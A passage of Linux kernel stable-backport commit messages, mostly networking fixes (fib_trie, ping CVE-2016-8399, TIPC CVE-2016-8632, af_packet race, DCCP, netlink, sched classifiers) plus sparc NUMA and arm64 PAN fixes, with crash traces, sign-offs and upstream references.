owned by node 0.Modules linked in:
CPU: 0 PID: 0 Comm: swapper Not tainted 4.9.0-rc3 #4
Call Trace:
[0000000000468ba0] __warn+0xc0/0xe0
[0000000000468c74] warn_slowpath_fmt+0x34/0x60
[00000000004592f4] find_node+0xf4/0x120
[0000000000dd0774] add_node_ranges+0x38/0xe4
[0000000000dd0b1c] numa_parse_mdesc+0x268/0x2e4
[0000000000dd0e9c] bootmem_init+0xb8/0x160
[0000000000dd174c] paging_init+0x808/0x8fc
[0000000000dcb0d0] setup_arch+0x2c8/0x2f0
[0000000000dc68a0] start_kernel+0x48/0x424
[0000000000dcb374] start_early_boot+0x27c/0x28c
[0000000000a32c08] tlb_fixup_done+0x4c/0x64
[0000000000027f08] 0x27f08
It is because linux use an internal structure node_masks[] to
keep the best memory latency node only. However, LDOM mdesc can
contain single latency-group with multiple memory latency nodes.
If the address doesn't match the best latency node within
node_masks[], it should check for an alternative via mdesc.
The warning message should only be printed if the address
doesn't match any node_masks[] nor within mdesc. To minimize
the impact of searching mdesc every time, the last matched
mask and index is stored in a variable.
Signed-off-by: Thomas Tai <thomas.tai@oracle.com>
Reviewed-by: Chris Hyser <chris.hyser@oracle.com>
Reviewed-by: Liam Merwick <liam.merwick@oracle.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a52ca62c4a ]
It has been reported that update_suffix can be expensive when it is called
on a large node in which most of the suffix lengths are the same. The time
required to add 200K entries had increased from around 3 seconds to almost
49 seconds.
In order to address this we need to move the code for updating the suffix
out of resize and instead just have it handled in the cases where we are
pushing a node that increases the suffix length, or will decrease the
suffix length.
Fixes: 5405afd1a3 ("fib_trie: Add tracking value for suffix length")
Reported-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Reviewed-by: Robert Shearman <rshearma@brocade.com>
Tested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 1a239173cc ]
It wasn't necessary to pass a leaf in when doing the suffix updates so just
drop it. Instead just pass the suffix and work with that.
Since we dropped the leaf there is no need to include that in the name so
the names are updated to node_push_suffix and node_pull_suffix.
Finally I noticed that the logic for pulling the suffix length back
actually had some issues. Specifically it would stop prematurely if there
was a longer suffix, but it was not as long as the original suffix. I
updated the code to address that in node_pull_suffix.
Fixes: 5405afd1a3 ("fib_trie: Add tracking value for suffix length")
Suggested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Reviewed-by: Robert Shearman <rshearma@brocade.com>
Tested-by: Robert Shearman <rshearma@brocade.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3b7093346b, the FIB offload
removal didn't occur in 4.8 so that part of this patch isn't here. However
we still need to fib_unmerge() bits. ]
The patch that removed the FIB offload infrastructure was a bit too
aggressive and also removed code needed to clean up us splitting the table
if additional rules were added. Specifically the function
fib_trie_flush_external was called at the end of a new rule being added to
flush the foreign trie entries from the main trie.
I updated the code so that we only call fib_trie_flush_external on the main
table so that we flush the entries for local from main. This way we don't
call it for every rule change which is what was happening previously.
Fixes: 347e3b28c1 ("switchdev: remove FIB offload infrastructure")
Reported-by: Eric Dumazet <edumazet@google.com>
Cc: Jiri Pirko <jiri@mellanox.com>
Signed-off-by: Alexander Duyck <alexander.h.duyck@intel.com>
Acked-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 0eab121ef8 ]
Prior to commit c0371da604 ("put iov_iter into msghdr") in v3.19, there
was no check that the iovec contained enough bytes for an ICMP header,
and the read loop would walk across neighboring stack contents. Since the
iov_iter conversion, bad arguments are noticed, but the returned error is
EFAULT. Returning EINVAL is a clearer error and also solves the problem
prior to v3.19.
This was found using trinity with KASAN on v3.18:
BUG: KASAN: stack-out-of-bounds in memcpy_fromiovec+0x60/0x114 at addr ffffffc071077da0
Read of size 8 by task trinity-c2/9623
page:ffffffbe034b9a08 count:0 mapcount:0 mapping: (null) index:0x0
flags: 0x0()
page dumped because: kasan: bad access detected
CPU: 0 PID: 9623 Comm: trinity-c2 Tainted: G BU 3.18.0-dirty #15
Hardware name: Google Tegra210 Smaug Rev 1,3+ (DT)
Call trace:
[<ffffffc000209c98>] dump_backtrace+0x0/0x1ac arch/arm64/kernel/traps.c:90
[<ffffffc000209e54>] show_stack+0x10/0x1c arch/arm64/kernel/traps.c:171
[< inline >] __dump_stack lib/dump_stack.c:15
[<ffffffc000f18dc4>] dump_stack+0x7c/0xd0 lib/dump_stack.c:50
[< inline >] print_address_description mm/kasan/report.c:147
[< inline >] kasan_report_error mm/kasan/report.c:236
[<ffffffc000373dcc>] kasan_report+0x380/0x4b8 mm/kasan/report.c:259
[< inline >] check_memory_region mm/kasan/kasan.c:264
[<ffffffc00037352c>] __asan_load8+0x20/0x70 mm/kasan/kasan.c:507
[<ffffffc0005b9624>] memcpy_fromiovec+0x5c/0x114 lib/iovec.c:15
[< inline >] memcpy_from_msg include/linux/skbuff.h:2667
[<ffffffc000ddeba0>] ping_common_sendmsg+0x50/0x108 net/ipv4/ping.c:674
[<ffffffc000dded30>] ping_v4_sendmsg+0xd8/0x698 net/ipv4/ping.c:714
[<ffffffc000dc91dc>] inet_sendmsg+0xe0/0x12c net/ipv4/af_inet.c:749
[< inline >] __sock_sendmsg_nosec net/socket.c:624
[< inline >] __sock_sendmsg net/socket.c:632
[<ffffffc000cab61c>] sock_sendmsg+0x124/0x164 net/socket.c:643
[< inline >] SYSC_sendto net/socket.c:1797
[<ffffffc000cad270>] SyS_sendto+0x178/0x1d8 net/socket.c:1761
CVE-2016-8399
Reported-by: Qidan He <i@flanker017.me>
Fixes: c319b4d76b ("net: ipv4: add IPPROTO_ICMP socket kind")
Cc: stable@vger.kernel.org
Signed-off-by: Kees Cook <keescook@chromium.org>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit b98b0bc8c4 ]
CAP_NET_ADMIN users should not be allowed to set negative
sk_sndbuf or sk_rcvbuf values, as it can lead to various memory
corruptions, crashes, OOM...
Note that before commit 8298193012 ("net: cleanups in
sock_setsockopt()"), the bug was even more serious, since SO_SNDBUF
and SO_RCVBUF were vulnerable.
This needs to be backported to all known linux kernels.
Again, many thanks to syzkaller team for discovering this gem.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 5b01014759 ]
geneve{,6}_build_skb can end up doing a pskb_expand_head(), which
makes the ip_hdr(skb) reference we stashed earlier stale. Since it's
only needed as an argument to ip_tunnel_ecn_encap(), move this
directly in the function call.
Fixes: 08399efc63 ("geneve: ensure ECN info is handled properly in all tx/rx paths")
Signed-off-by: Sabrina Dubroca <sd@queasysnail.net>
Reviewed-by: John W. Linville <linville@tuxdriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 3de81b7588 ]
Qian Zhang (张谦) reported a potential socket buffer overflow in
tipc_msg_build() which is also known as CVE-2016-8632: due to
insufficient checks, a buffer overflow can occur if MTU is too short for
even tipc headers. As anyone can set device MTU in a user/net namespace,
this issue can be abused by a regular user.
As agreed in the discussion on Ben Hutchings' original patch, we should
check the MTU at the moment a bearer is attached rather than for each
processed packet. We also need to repeat the check when bearer MTU is
adjusted to new device MTU. UDP case also needs a check to avoid
overflow when calculating bearer MTU.
Fixes: b97bf3fd8f ("[TIPC] Initial merge")
Signed-off-by: Michal Kubecek <mkubecek@suse.cz>
Reported-by: Qian Zhang (张谦) <zhangqian-c@360.cn>
Acked-by: Ying Xue <ying.xue@windriver.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 33d446dbba ]
When streaming a lot of data and the RZ/A1 can't keep up, some status bits
will get set that are not being checked or cleared which cause the
following messages and the Ethernet driver to stop working. This
patch fixes that issue.
irq 21: nobody cared (try booting with the "irqpoll" option)
handlers:
[<c036b71c>] sh_eth_interrupt
Disabling IRQ #21
Fixes: db893473d3 ("sh_eth: Add support for r7s72100")
Signed-off-by: Chris Brandt <chris.brandt@renesas.com>
Acked-by: Sergei Shtylyov <sergei.shtylyov@cogentembedded.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 8c4799ac79 ]
__bcmgenet_tx_reclaim() and bcmgenet_free_rx_buffers() are not using the
same struct device during unmap that was used for the map operation,
which makes DMA-API debugging warn about it. Fix this by always using
&priv->pdev->dev throughout the driver, using an identical device
reference for all map/unmap calls.
Fixes: 1c1008c793 ("net: bcmgenet: add main driver file")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d5c83d0d1d ]
Commit bfe9b9d2df ("cdc_ether: Improve ZTE MF823/831/910 handling")
introduced a work-around in usbnet_cdc_status() for devices that exported
cdc carrier on twice on connect. Before the commit, this behavior caused
the link state to be incorrect. It was assumed that all CDC Ethernet
devices would either export this behavior, or send one off and then one on
notification (which seems to be the default behavior).
Unfortunately, it turns out multiple devices sends a connection
notification multiple times per second (via an interrupt), even when
connection state does not change. This has been observed with several
different USB LAN dongles (at least), for example 13b1:0041 (Linksys).
After bfe9b9d2df, the link state has been set as down and then up for
each notification. This has caused a flood of Netlink NEWLINK messages and
syslog to be flooded with messages similar to:
cdc_ether 2-1:2.0 eth1: kevent 12 may have been dropped
This commit fixes the behavior by reverting usbnet_cdc_status() to how it
was before bfe9b9d2df. The work-around has been moved to a separate
status-function which is only called when a known, affect device is
detected.
v1->v2:
* Do not open-code netif_carrier_ok() (thanks Henning Schild).
* Call netif_carrier_off() instead of usb_link_change(). This prevents
calling schedule_work() twice without giving the work queue a chance to be
processed (thanks Bjørn Mork).
Fixes: bfe9b9d2df ("cdc_ether: Improve ZTE MF823/831/910 handling")
Reported-by: Henning Schild <henning.schild@siemens.com>
Signed-off-by: Kristian Evensen <kristian.evensen@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 84ac726023 ]
When packet_set_ring creates a ring buffer it will initialize a
struct timer_list if the packet version is TPACKET_V3. This value
can then be raced by a different thread calling setsockopt to
set the version to TPACKET_V1 before packet_set_ring has finished.
This leads to a use-after-free on a function pointer in the
struct timer_list when the socket is closed as the previously
initialized timer will not be deleted.
The bug is fixed by taking lock_sock(sk) in packet_setsockopt when
changing the packet version while also taking the lock at the start
of packet_set_ring.
Fixes: f6fb8f100b ("af-packet: TPACKET_V3 flexible buffer implementation.")
Signed-off-by: Philip Pettersson <philip.pettersson@gmail.com>
Signed-off-by: Eric Dumazet <edumazet@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 648f0c28df ]
pskb_may_pull() can reallocate skb->head, we need to reload dh pointer
in dccp_invalid_packet() or risk use after free.
Bug found by Andrey Konovalov using syzkaller.
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit a0b44eea37 ]
On macb only (not gem), when a RX queue corruption was detected from
macb_rx(), the RX queue was reset: during this process the RX ring
buffer descriptor was initialized by macb_init_rx_ring() but we forgot
to also set bp->rx_tail to 0.
Indeed, when processing the received frames, bp->rx_tail provides the
macb driver with the index in the RX ring buffer of the next buffer to
process. So when the whole ring buffer is reset we must also reset
bp->rx_tail so the driver is synchronized again with the hardware.
Since macb_init_rx_ring() is called from many locations, currently from
macb_rx() and macb_init_rings(), we'd rather add the "bp->rx_tail = 0;"
line inside macb_init_rx_ring() than add the very same line after each
call of this function.
Without this fix, the rx queue is not reset properly to recover from
queue corruption and connection drop may occur.
Signed-off-by: Cyrille Pitchen <cyrille.pitchen@atmel.com>
Fixes: 9ba723b081 ("net: macb: remove BUG_ON() and reset the queue to handle RX errors")
Acked-by: Nicolas Ferre <nicolas.ferre@atmel.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit ed5d7788a9 ]
It is wrong to schedule a work from sk_destruct using the socket
as the memory reserve because the socket will be freed immediately
after the return from sk_destruct.
Instead we should do the deferral prior to sk_free.
This patch does just that.
Fixes: 707693c8a4 ("netlink: Call cb->done from a worker thread")
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Tested-by: Andrey Konovalov <andreyknvl@google.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 707693c8a4 ]
The cb->done interface expects to be called in process context.
This was broken by the netlink RCU conversion. This patch fixes
it by adding a worker struct to make the cb->done call where
necessary.
Fixes: 21e4902aea ("netlink: Lockless lookup with RCU grace...")
Reported-by: Subash Abhinov Kasiviswanathan <subashab@codeaurora.org>
Signed-off-by: Herbert Xu <herbert@gondor.apana.org.au>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 95c2027bfe ]
Add a validation function to make sure offset is valid:
1. Not below skb head (could happen when offset is negative).
2. Validate both 'offset' and 'at'.
Signed-off-by: Amir Vadai <amir@vadai.me>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 7a99cd6e21 ]
_dsa_register_switch() gets a dsa_switch_tree object either via
dsa_get_dst() or via dsa_add_dst(). Former path does not increase kref
in returned object (resulting into caller not owning a reference),
while later path does create a new object (resulting into caller owning
a reference).
The rest of _dsa_register_switch() assumes that it owns a reference, and
calls dsa_put_dst().
This causes a memory breakage if first switch in the tree initialized
successfully, but second failed to initialize. In particular, freed
dsa_swith_tree object is left referenced by switch that was initialized,
and later access to sysfs attributes of that switch cause OOPS.
To fix, need to add kref_get() call to dsa_get_dst().
Fixes: 83c0afaec7 ("net: dsa: Add new binding implementation")
Signed-off-by: Nikita Yushchenko <nikita.yoush@cogentembedded.com>
Reviewed-by: Andrew Lunn <andrew@lunn.ch>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit d936377414 ]
Roi reported a crash in flower where tp->root was NULL in ->classify()
callbacks. Reason is that in ->destroy() tp->root is set to NULL via
RCU_INIT_POINTER(). It's problematic for some of the classifiers, because
this doesn't respect RCU grace period for them, and as a result, still
outstanding readers from tc_classify() will try to blindly dereference
a NULL tp->root.
The tp->root object is strictly private to the classifier implementation
and holds internal data the core such as tc_ctl_tfilter() doesn't know
about. Within some classifiers, such as cls_bpf, cls_basic, etc, tp->root
is only checked for NULL in ->get() callback, but nowhere else. This is
misleading and seemed to be copied from old classifier code that was not
cleaned up properly. For example, d3fa76ee6b ("[NET_SCHED]: cls_basic:
fix NULL pointer dereference") moved tp->root initialization into ->init()
routine, where before it was part of ->change(), so ->get() had to deal
with tp->root being NULL back then, so that was indeed a valid case, after
d3fa76ee6b, not really anymore. We used to set tp->root to NULL long
ago in ->destroy(), see 47a1a1d4be ("pkt_sched: remove unnecessary xchg()
in packet classifiers"); but the NULLifying was reintroduced with the
RCUification, but it's not correct for every classifier implementation.
In the cases that are fixed here with one exception of cls_cgroup, tp->root
object is allocated and initialized inside ->init() callback, which is always
performed at a point in time after we allocate a new tp, which means tp and
thus tp->root was not globally visible in the tp chain yet (see tc_ctl_tfilter()).
Also, on destruction tp->root is strictly kfree_rcu()'ed in ->destroy()
handler, same for the tp which is kfree_rcu()'ed right when we return
from ->destroy() in tcf_destroy(). This means, the head object's lifetime
for such classifiers is always tied to the tp lifetime. The RCU callback
invocation for the two kfree_rcu() could be out of order, but that's fine
since both are independent.
Dropping the RCU_INIT_POINTER(tp->root, NULL) for these classifiers here
means that 1) we don't need a useless NULL check in fast-path and, 2) that
outstanding readers of that tp in tc_classify() can still execute under
respect with RCU grace period as it is actually expected.
Things that haven't been touched here: cls_fw and cls_route. They each
handle tp->root being NULL in ->classify() path for historic reasons, so
their ->destroy() implementation can stay as is. If someone actually
cares, they could get cleaned up at some point to avoid the test in fast
path. cls_u32 doesn't set tp->root to NULL. For cls_rsvp, I just added a
!head should anyone actually be using/testing it, so it at least aligns with
cls_fw and cls_route. For cls_flower we additionally need to defer rhashtable
destruction (to a sleepable context) after RCU grace period as concurrent
readers might still access it. (Note that in this case we need to hold module
reference to keep work callback address intact, since we only wait on module
unload for all call_rcu()s to finish.)
This fixes one race to bring RCU grace period guarantees back. Next step
as worked on by Cong however is to fix 1e052be69d ("net_sched: destroy
proto tp when all filters are gone") to get the order of unlinking the tp
in tc_ctl_tfilter() for the RTM_DELTFILTER case right by moving
RCU_INIT_POINTER() before tcf_destroy() and let the notification for
removal be done through the prior ->delete() callback. Both are independant
issues. Once we have that right, we can then clean tp->root up for a number
of classifiers by not making them RCU pointers, which requires a new callback
(->uninit) that is triggered from tp's RCU callback, where we just kfree()
tp->root from there.
Fixes: 1f947bf151 ("net: sched: rcu'ify cls_bpf")
Fixes: 9888faefe1 ("net: sched: cls_basic use RCU")
Fixes: 70da9f0bf9 ("net: sched: cls_flow use RCU")
Fixes: 77b9900ef5 ("tc: introduce Flower classifier")
Fixes: bf3994d2ed ("net/sched: introduce Match-all classifier")
Fixes: 952313bd62 ("net: sched: cls_cgroup use RCU")
Reported-by: Roi Dayan <roid@mellanox.com>
Signed-off-by: Daniel Borkmann <daniel@iogearbox.net>
Cc: Cong Wang <xiyou.wangcong@gmail.com>
Cc: John Fastabend <john.fastabend@gmail.com>
Cc: Roi Dayan <roid@mellanox.com>
Cc: Jiri Pirko <jiri@mellanox.com>
Acked-by: John Fastabend <john.r.fastabend@intel.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 76da8706d9 ]
In case the link change and EEE is enabled or disabled, always try to
re-negotiate this with the link partner.
Fixes: 450b05c15f ("net: dsa: bcm_sf2: add support for controlling EEE")
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 30c7be26fd ]
In commits 93821778de ("udp: Fix rcv socket locking") and
f7ad74fef3 ("net/ipv6/udp: UDP encapsulation: break backlog_rcv into
__udpv6_queue_rcv_skb") UDP backlog handlers were renamed, but UDPlite
was forgotten.
This leads to crashes if UDPlite header is pulled twice, which happens
starting from commit e6afc8ace6 ("udp: remove headers from UDP packets
before queueing")
Bug found by syzkaller team, thanks a lot guys !
Note that backlog use in UDP/UDPlite is scheduled to be removed starting
from linux-4.10, so this patch is only needed up to linux-4.9
Fixes: 93821778de ("udp: Fix rcv socket locking")
Fixes: f7ad74fef3 ("net/ipv6/udp: UDP encapsulation: break backlog_rcv into __udpv6_queue_rcv_skb")
Fixes: e6afc8ace6 ("udp: remove headers from UDP packets before queueing")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Andrey Konovalov <andreyknvl@google.com>
Cc: Benjamin LaHaise <bcrl@kvack.org>
Cc: Herbert Xu <herbert@gondor.apana.org.au>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 764d3be6e4 ]
When an ipv6 address has the tentative flag set, it can't be
used as source for egress traffic, while the associated route,
if any, can be looked up and even stored into some dst_cache.
In the latter scenario, the source ipv6 address selected and
stored in the cache is most probably wrong (e.g. with
link-local scope) and the entity using the dst_cache will
experience lack of ipv6 connectivity until said cache is
cleared or invalidated.
Overall this may cause lack of connectivity over most IPv6 tunnels
(comprising geneve and vxlan), if the first egress packet reaches
the tunnel before the DaD is completed for the used ipv6
address.
This patch bumps a new genid after that the IFA_F_TENTATIVE flag
is cleared, so that dst_cache will be invalidated on
next lookup and ipv6 connectivity restored.
Fixes: 0c1d70af92 ("net: use dst_cache for vxlan device")
Fixes: 468dfffcd7 ("geneve: add dst caching support")
Acked-by: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Paolo Abeni <pabeni@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 06a77b07e3 ]
Commit 2b15af6f95 ("af_unix: use freezable blocking calls in read")
converts schedule_timeout() to its freezable version, it was probably
correct at that time, but later, commit 2b514574f7
("net: af_unix: implement splice for stream af_unix sockets") breaks
the strong requirement for a freezable sleep, according to
commit 0f9548ca10:
We shouldn't try_to_freeze if locks are held. Holding a lock can cause a
deadlock if the lock is later acquired in the suspend or hibernate path
(e.g. by dpm). Holding a lock can also cause a deadlock in the case of
cgroup_freezer if a lock is held inside a frozen cgroup that is later
acquired by a process outside that group.
The pipe_lock is still held at that point.
So use freezable version only for the recvmsg call path, avoid impact for
Android.
Fixes: 2b514574f7 ("net: af_unix: implement splice for stream af_unix sockets")
Reported-by: Dmitry Vyukov <dvyukov@google.com>
Cc: Tejun Heo <tj@kernel.org>
Cc: Colin Cross <ccross@android.com>
Cc: Rafael J. Wysocki <rafael.j.wysocki@intel.com>
Cc: Hannes Frederic Sowa <hannes@stressinduktion.org>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 06ba3b2133 ]
The sky2 frequently crashes during machine shutdown with:
sky2_get_stats+0x60/0x3d8 [sky2]
dev_get_stats+0x68/0xd8
rtnl_fill_stats+0x54/0x140
rtnl_fill_ifinfo+0x46c/0xc68
rtmsg_ifinfo_build_skb+0x7c/0xf0
rtmsg_ifinfo.part.22+0x3c/0x70
rtmsg_ifinfo+0x50/0x5c
netdev_state_change+0x4c/0x58
linkwatch_do_dev+0x50/0x88
__linkwatch_run_queue+0x104/0x1a4
linkwatch_event+0x30/0x3c
process_one_work+0x140/0x3e0
worker_thread+0x60/0x44c
kthread+0xdc/0xf0
ret_from_fork+0x10/0x50
This is caused by the sky2 being called after it has been shutdown.
A previous thread about this can be found here:
https://lkml.org/lkml/2016/4/12/410
An alternative fix is to assure that IFF_UP gets cleared by
calling dev_close() during shutdown. This is similar to what the
bnx2/tg3/xgene and maybe others are doing to assure that the driver
isn't being called following _shutdown().
Signed-off-by: Jeremy Linton <jeremy.linton@arm.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit cfc44a4d14 ]
Andrei reports we still allocate netns ID from idr after we destroy
it in cleanup_net().
cleanup_net():
...
idr_destroy(&net->netns_ids);
...
list_for_each_entry_reverse(ops, &pernet_list, list)
ops_exit_list(ops, &net_exit_list);
-> rollback_registered_many()
-> rtmsg_ifinfo_build_skb()
-> rtnl_fill_ifinfo()
-> peernet2id_alloc()
After that point we should not even access net->netns_ids, we
should check the death of the current netns as early as we can in
peernet2id_alloc().
For net-next we can consider to avoid sending rtmsg totally,
it is a good optimization for netns teardown path.
Fixes: 0c7aecd4bd ("netns: add rtnl cmd to add and get peer netns ids")
Reported-by: Andrei Vagin <avagin@gmail.com>
Cc: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: Cong Wang <xiyou.wangcong@gmail.com>
Acked-by: Andrei Vagin <avagin@openvz.org>
Signed-off-by: Nicolas Dichtel <nicolas.dichtel@6wind.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e47112d9d6 ]
We currently have a fundamental problem in how we treat the CPU port and
its VLAN membership. As soon as a second VLAN is configured to be
untagged, the CPU automatically becomes untagged for that VLAN as well,
and yet, we don't gracefully make sure that the CPU becomes tagged in
the other VLANs it could be a member of. This results in only one VLAN
being effectively usable from the CPU's perspective.
Instead of having some pretty complex logic which tries to maintain the
CPU port's default VLAN and its untagged properties, just do something
very simple which consists in neither altering the CPU port's PVID
settings, nor its untagged settings:
- whenever a VLAN is added, the CPU is automatically a member of this
VLAN group, as a tagged member
- PVID settings for downstream ports do not alter the CPU port's PVID
since it now is part of all VLANs in the system
This means that a typical example where e.g: LAN ports are in VLAN1, and
WAN port is in VLAN2, now require having two VLAN interfaces for the
host to properly terminate and send traffic from/to.
Fixes: Fixes: a2482d2ce3 ("net: dsa: b53: Plug in VLAN support")
Reported-by: Hartmut Knaack <knaack.h@gmx.de>
Signed-off-by: Florian Fainelli <f.fainelli@gmail.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit 963abe5c8a ]
It seems many drivers do not respect napi_hash_del() contract.
When napi_hash_del() is used before netif_napi_del(), an RCU grace
period is needed before freeing NAPI object.
Fixes: 91815639d8 ("virtio-net: rx busy polling support")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Cc: Jason Wang <jasowang@redhat.com>
Cc: Michael S. Tsirkin <mst@redhat.com>
Acked-by: Michael S. Tsirkin <mst@redhat.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
[ Upstream commit e88a276614 ]
Rolf Neugebauer reported very long delays at netns dismantle.
Eric W. Biederman was kind enough to look at this problem
and noticed synchronize_net() occurring from netif_napi_del() that was
added in linux-4.5
Busy polling makes no sense for tunnels NAPI.
If busy poll is used for sessions over tunnels, the poller will need to
poll the physical device queue anyway.
netif_tx_napi_add() could be used here, but function name is misleading,
and renaming it is not stable material, so set NAPI_STATE_NO_BUSY_POLL
bit directly.
This will avoid inserting gro_cells napi structures in napi_hash[]
and avoid the problematic synchronize_net() (per possible cpu) that
Rolf reported.
Fixes: 93d05d4a32 ("net: provide generic busy polling to all NAPI drivers")
Signed-off-by: Eric Dumazet <edumazet@google.com>
Reported-by: Rolf Neugebauer <rolf.neugebauer@docker.com>
Reported-by: Eric W. Biederman <ebiederm@xmission.com>
Acked-by: Cong Wang <xiyou.wangcong@gmail.com>
Tested-by: Rolf Neugebauer <rolf.neugebauer@docker.com>
Signed-off-by: David S. Miller <davem@davemloft.net>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit d08544127d upstream.
The suspend/resume path in kernel/sleep.S, as used by cpu-idle, does not
save/restore PSTATE. As a result of this cpufeatures that were detected
and have bits in PSTATE get lost when we resume from idle.
UAO gets set appropriately on the next context switch. PAN will be
re-enabled next time we return from user-space, but on a preemptible
kernel we may run work accessing user space before this point.
Add code to re-enable theses two features in __cpu_suspend_exit().
We re-use uao_thread_switch() passing current.
Signed-off-by: James Morse <james.morse@arm.com>
Cc: Lorenzo Pieralisi <lorenzo.pieralisi@arm.com>
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 7209c86860 upstream.
Commit 338d4f49d6 ("arm64: kernel: Add support for Privileged Access
Never") enabled PAN by enabling the 'SPAN' feature-bit in SCTLR_EL1.
This means the PSTATE.PAN bit won't be set until the next return to the
kernel from userspace. On a preemptible kernel we may schedule work that
accesses userspace on a CPU before it has done this.
Now that cpufeature enable() calls are scheduled via stop_machine(), we
can set PSTATE.PAN from the cpu_enable_pan() call.
Add WARN_ON_ONCE(in_interrupt()) to check the PSTATE value we updated
is not immediately discarded.
Reported-by: Tony Thompson <anthony.thompson@arm.com>
Reported-by: Vladimir Murzin <vladimir.murzin@arm.com>
Signed-off-by: James Morse <james.morse@arm.com>
[will: fixed typo in comment]
Signed-off-by: Will Deacon <will.deacon@arm.com>
Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
commit 2a6dcb2b5f upstream.
The enable() call for a cpufeature/errata is called using on_each_cpu().
This issues a cross-call IPI to get the work done. Implicitly, this
stashes the running PSTATE in SPSR when the CPU receives the IPI, and
restores it when we return. This means an enable() call can never modify
PSTATE.
To allow PAN to do this, change the on_each_cpu() call to use
stop_machine(). This schedules the work on each CPU which allows
us to modify PSTATE.
This involves changing the protype of all the enable() functions.
enable_cpu_capabilities() is called during boot and enables the feature
on all online CPUs. This path now uses stop_machine(). CPU features for
hotplug'd CPUs are enabled by verify_local_cpu_features() which only
acts on the local CPU, and can already modify the running PSTATE as it
is called from secondary_start_kernel().
Reported-by: Tony Thompson <anthony.thompson@arm.com>
Reported-by: Vladimir Murzin <vladimir.murzin@arm.com>
